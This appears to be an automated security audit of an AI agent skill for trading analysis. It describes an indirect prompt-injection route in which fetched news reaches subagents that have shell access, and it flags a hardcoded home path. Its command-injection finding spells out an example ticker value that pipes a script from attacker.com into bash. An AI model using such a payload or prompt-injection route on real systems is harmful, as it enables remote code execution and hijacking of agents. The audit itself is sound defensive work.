trading-analysis
Pass
Audited by Gen Agent Trust Hub on May 2, 2026
Risk Level: SAFECOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
- [PROMPT_INJECTION]: The skill is vulnerable to Indirect Prompt Injection due to the way it handles external data.
- Ingestion points: The 'News & Sentiment Analyst' (Subagent 2) fetches external news and headlines using a python script.
- Boundary markers: Absent. The reports generated from external news are interpolated directly into the prompts for the Bull, Bear, Risk, and Research Manager subagents using simple placeholders like
[insert full news report from Phase 1]. - Capability inventory: Subagents have the capability to execute shell commands via
bash(specificallyuv runcommands). - Sanitization: There is no evidence of sanitization, escaping, or instructions to the LLM to ignore instructions embedded within the news content.
- [COMMAND_EXECUTION]: Potential for shell command injection through the
$TICKERvariable. - The variable
$TICKERis extracted from$ARGUMENTSand passed directly into a bash command line:uv run ... --ticker $TICKER. If the extraction logic does not strictly validate the ticker format, an attacker could provide a malicious string (e.g.,NVDA; curl http://attacker.com/shell | bash) to execute arbitrary commands. - [DATA_EXPOSURE]: Exposure of local environment metadata.
- The skill hardcodes absolute file paths pointing to a specific user's home directory (
/Users/davidchen/repo/). This reveals the local username and directory structure, which is a form of information leakage and limits the portability of the skill.
Audit Metadata